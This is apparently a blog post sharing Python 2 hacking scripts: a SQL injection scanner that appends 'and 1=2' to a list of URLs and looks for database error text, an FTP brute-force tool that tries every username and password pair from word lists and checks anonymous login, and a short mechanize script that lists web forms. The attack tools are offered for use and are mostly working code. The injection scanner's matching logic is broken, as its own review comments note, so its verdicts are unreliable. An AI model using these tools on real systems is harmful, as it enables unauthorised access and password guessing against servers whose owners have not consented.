Injection point finder hacker python

Python SQL Injection Scanner

#!/usr/bin/python
#-*-coding=utf-8-*-
 #Example site:@http://www.apostilando.com/pagina.php?cod=1
#List the web sites to be scanned in a text file in the current directory, then run: python xxx.py xxx.txt

import urllib
import os
import sys

# Start from a blank terminal: Windows ("nt") uses cls, everything else clear.
os.system("cls" if os.name == "nt" else "clear")
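def usage():
    """Print the banner followed by the command line for this script.

    main() calls this both on a correct invocation and when the argument
    count is wrong, so it must work when no file argument was given.
    """
    # sys.argv[1] is missing exactly when the user needs the usage text;
    # indexing it unconditionally raised IndexError instead of printing help.
    list_file = sys.argv[1] if len(sys.argv) > 1 else "<File>"
    print("""
    =================SQL INJECTION=====================
    Usage:python %s %s
    """ % (sys.argv[0], list_file))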
    
def scanner(url):
    """Fetch *url* and print a one-line verdict based on database error text.

    Returns 0 when the fetch fails. Otherwise it prints a "[-]" or "[+]" line
    for the URL and returns None.

    NOTE(review): the verdict is not reliable as written - see the comments
    in the matching loop. It should not be used as evidence that a page is,
    or is not, affected.
    """
    try:
        page = urllib.urlopen(url).read()
    except:
        # Bare except: every failure (bad URL, network error, Ctrl-C) is
        # reported as the same generic error and the URL is skipped.
        print "[-]Error!!!\n"
        return(0)
    # Driver warning fragments that some applications echo back to the client
    # when a query fails (MySQL, SQL Server; the last two look like Oracle OCI
    # and PostgreSQL messages). They only show up when the application leaks
    # raw database errors, so their absence says nothing about whether the
    # query behind the page is parameterised.
    sqls = ("mysql_result(): supplied argument is not a valid MySQL result resource in",
            "[Microsoft][ODBC SQL Server Driver][SQL Server]",
            "Warning:ociexecute",
            "Warning: pq_query[function.pg-query]:")
    i=0
    page = str(page.lower())
    while i<len(sqls):
        sql = str(sqls[i]).lower()
        # NOTE(review): sql[i] is the i-th *character* of the signature, not
        # the signature itself, so this tests for a single character.
        if page.find(sql[i]) == -1:
            check=0
        else:
            # NOTE(review): check is reassigned on every pass, so only the
            # final pass decides the verdict printed below.
            check=1
        i+=1
    if check == 0:
        print "[-]"+url+" <No Vulneravel>"
    else:
        print "[+]"+url+" <Vulneravel>"
        
def main(args):
    """Read a list of sites from a file and pass each one to scanner().

    *args* is the command line without the program name and is used only for
    the argument-count check. The file name itself is read from sys.argv[1].
    Exits with status 0 after printing help when the count is wrong, and
    returns -1 when the file cannot be read.
    """
    if len(args)!=1:
        usage()
        print "\t[-]Mode to use: %s <File>\n" % sys.argv[0]
        print "\t[-]Example: %s Site.txt\n" % sys.argv[0]
        sys.exit(0)
    usage()
    try:
        f = open(str(sys.argv[1]),"r")
        urls = f.readlines()
    except:
        # Bare except: a missing file and a read error give the same message.
        print "[+]Error to open the file "+sys.argv[1]+""
        return(-1)
    f.close()
    i=0
    while i<len(urls):
        # "http://" is prepended whenever that exact text does not occur
        # anywhere in the line, which includes lines that start with https://.
        if urls[i].find("http://") == -1:
            urls[i] = "http://" + urls[i]
        urls[i] = urls[i].replace("\n","")
        # The request URL is the listed URL with the literal text "and 1=2"
        # appended directly (no separator). scanner() prints the verdict, and
        # its return value, stored in a, is never read.
        a = scanner(urls[i]+"and 1=2")
        i+=1
        
# Script entry point: pass everything after the program name to main().
if __name__ == "__main__":
    main(sys.argv[1:])

FTP Brute Forcing Tool -- Python FTP brute force tool

Build your own username and password dictionaries in the current directory, and the tool will try them to find a valid username and password.

#!/usr/bin/env python
#-*-coding = utf-8-*-
import sys, os, time   
from ftplib import FTP

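# Banner text printed by logo(). It is runtime output, so it is kept verbatim.
docs = """
    [*] This was written for educational purpose and pentest only. Use it at your own risk.
    [*] Author will be not responsible for any damage!
    [*] Toolname        : ftp_bf.py
    [*] Coder           : 
    [*] Version         : 0.1
    [*] ample of use  : python ftp_bf.py -t ftp.server.com -u usernames.txt -p passwords.txt
    """

# Choose the screen-clearing command by OS family. The earlier check treated
# every platform that was not Linux (macOS, BSD, ...) as Windows and ran
# "cls" there. os.name is "nt" only on Windows.
clearing = 'cls' if os.name == 'nt' else 'clear'
os.system(clearing)

# ANSI colour escapes used by the print helpers: red, green, yellow, reset.
R = "\033[31m"
G = "\033[32m"
Y = "\033[33m"
END = "\033[0m"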

def logo():
    """Print the green ASCII banner, the current time and the docs text."""
    # Each entry is printed on its own line, in order. The colour opened by G
    # on the first row is reset by END after the docs text.
    banner_rows = (
        G+"\n         |---------------------------------------------------------------|",
        "        |                                                               |",
        "        |          blog.sina.com.cn/kaiyongdeng                    |",
        "        |            08/05/2012 ftp_bf.py v.0.1                     |",
        "        |            FTP Brute Forcing Tool                       |",
        "        |                                                               |",
        "        |---------------------------------------------------------------|\n",
        "    \n         [-] %s\n" % time.strftime("%X"),
        docs+END,
    )
    for row in banner_rows:
        print(row)
    
def help():
    """Print the option summary in red and exit with status 1."""
    option_rows = [
        "[*]-t, --target            ip/hostname     <> Our target",
        "[*]-u, --usernamelist      usernamelist    <> usernamelist path",
        "[*]-p, --passwordlist      passwordlist    <> passwordlist path",
        "[*]-h, --help              help            <> print this help",
        "[*]Example : python ftp_bf -t ftp.server.com -u username.txt -p passwords.txt",
    ]
    # One write with embedded newlines produces the same output as one print
    # per row.
    print(R + "\n".join(option_rows) + END)
    sys.exit(1)

def bf_login(hostname,username,password):
    """Try one username/password pair against the FTP server at *hostname*.

    Returns 1 when login and a directory listing both succeed. On any
    ordinary exception it returns None implicitly. Ctrl-C exits the process
    with status 1.
    """
    try:
        # A new control connection is opened for every call, so on the server
        # each attempt appears as a separate session with a single login.
        ftp = FTP(hostname)
        ftp.login(username, password)
        ftp.retrlines('list')
        # quit() is reached only on success. If login or the listing raises,
        # the connection is never closed explicitly.
        ftp.quit()
        print Y+"\n[!] w00t,w00t!!! We did it ! "
        print "[+] Target : ",hostname, ""
        print "[+] User : ",username, ""
        # The accepted password is written to stdout in clear text, so it
        # ends up in terminal scrollback and in any captured output.
        print "[+] Password : ",password, ""+END
        return 1
    except Exception, e:
        # Every error is swallowed: a refused connection, a timeout and a
        # rejected password all look the same to the caller.
        pass
    except KeyboardInterrupt:
        print R+"\n[-] Exiting ...\n"+END
        sys.exit(1)

def anon_login(hostname):
    """Check whether the FTP server at *hostname* accepts an anonymous login.

    Prints the outcome and returns None in both cases.
    """
    try:
        print G+"\n[!] Checking for anonymous login.\n"+END
        ftp = FTP(hostname)
        # login() with no arguments uses ftplib's default anonymous user.
        ftp.login()
        # retrlines() without a callback prints the listing to stdout.
        ftp.retrlines('LIST')
        print Y+"\n[!] w00t,w00t!!! Anonymous login successfuly !\n"+END
        
        ftp.quit()
    except Exception, e:
        # Any exception, including a failed connection, is reported as a
        # failed anonymous login, so the message does not prove that the
        # server rejects anonymous users.
        print R+"\n[-] Anonymous login failed...\n"+END
        pass
def main():
    """Parse the command line, load both word lists and try every pair.

    Exits with status 1 through help() or sys.exit() on bad options or
    unreadable list files. Returns None otherwise.
    """
    logo()
    try:
        for arg in sys.argv:
            # For each flag the value is the argument that follows it:
            # index within sys.argv[1:] plus 2 is the next slot in sys.argv.
            if arg.lower() == '-t' or arg.lower() == '--target':
                hostname = sys.argv[int(sys.argv[1:].index(arg))+2]
            elif arg.lower() == '-u' or arg.lower() == '--usernamelist':
                usernamelist = sys.argv[int(sys.argv[1:].index(arg))+2]
            elif arg.lower() == '-p' or arg.lower() == '--passwordlist':
                passwordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
            elif arg.lower() == '-h' or arg.lower() == '--help':
                help()
            elif len(sys.argv) <= 1:
                help()
    except:
        # The bare except also catches the SystemExit raised by help() above,
        # so a plain -h prints this message and the help text a second time.
        print R+"[-]Cheak your parametars input\n"+END
        help()
    print G+"[!] BruteForcing target ..."+END
    # NOTE(review): if -t, -u or -p was not given, the matching name was never
    # bound, and its first use fails with an uncaught NameError (or, inside
    # the try blocks below, with the "path" message).
    anon_login(hostname)
    try:
        usernames = open(usernamelist, "r")
        user = usernames.readlines()
        count1 = 0
        # Strip surrounding whitespace, including the newline, from each entry.
        while count1 < len(user):
            user[count1] = user[count1].strip()
            count1 +=1
    except:
        print R+"\n[-] Cheak your usernamelist path\n"+END
        sys.exit(1)
    try:
        passwords = open(passwordlist, "r")
        pwd = passwords.readlines()
        count2 = 0
        while count2 < len(pwd):
            pwd[count2] = pwd[count2].strip()
            count2 +=1
    except:
        print R+"\n[-] Check your passwordlist path\n"+END
        sys.exit(1)
    # Neither list file is closed explicitly.

    print G+"\n[+] Loaded:",len(user),"usernames"
    print "\n[+] Loaded:",len(pwd),"passwords"
    print "[+] Target:",hostname
    print "[+] Guessing...\n"+END

    # Every username is paired with every password, with no delay between
    # attempts. The server sees len(user) * len(pwd) logins from one source,
    # which is the pattern that failed-login rate limits and lockouts catch.
    for u in user:
        for p in pwd:
            # The entries were already stripped, so replace() is a no-op here.
            result = bf_login(hostname,u.replace("\n",""),p.replace("\n",""))
            if result != 1:
                print G+"[+]Attempt uaername:%s password:%s..." % (u,p) + R+"Disenable"+END
            else:
                print G+"[+]Attempt uaername:%s password:%s..." % (u,p) + Y+"Enable"+END
    # NOTE(review): result holds only the outcome of the last pair tried, so
    # this summary can contradict an earlier "Enable" line. It is unbound
    # (NameError) when either list is empty.
    if not result :
        print R+"\n[-]There is no username ans password enabled in the list."
        print "[-]Exiting...\n"+END

# Script entry point. main() reads its options from sys.argv itself.
if __name__ == "__main__":
    main()

Powerful python module - mechanize

Today I found a really impressive Python module. Let's have a look. It's better than the standard urllib and urllib2!

  • mechanize.Browser and mechanize.UserAgentBase implement the interface of urllib2.OpenerDirector, so:
    • any URL can be opened, not just http:
    • mechanize.UserAgentBase offers easy dynamic configuration of user-agent features like protocol, cookie, redirection and robots.txt handling, without having to make a new OpenerDirector each time, e.g. by calling build_opener().
  • Easy HTML form filling.
  • Convenient link parsing and following.
  • Browser history (.back() and .reload() methods).
  • The Referer HTTP header is added properly (optional).
  • Automatic observance of robots.txt.
  • Automatic handling of HTTP-Equiv and Refresh.

Extract web form information

#!/usr/bin/env python

#-*-coding = utf-8-*-

import mechanize
import sys

# Open the page named on the command line and list every form found on it.
browser = mechanize.Browser()
response = browser.open(sys.argv[1])
for page_form in browser.forms():
    form_id = page_form.attrs.get('id')
    print "name:[%r] id:[%r] action:[%s]" % (page_form.name, form_id, page_form.action)
    print "Controls: "
    for field in page_form.controls:
        # One line per control: its type, its name and the repr of its value.
        print '    ', field.type, field.name, repr(field.value)
    print(" ")


This is the simplest script I have seen for extracting form information from web pages with Python; it is short and to the point. The key is the mechanize module. There are few introductions to this module on the Internet, so you will mostly have to explore it on your own.


Posted on Fri, 01 Nov 2019 20:25:16 -0400 by jl9148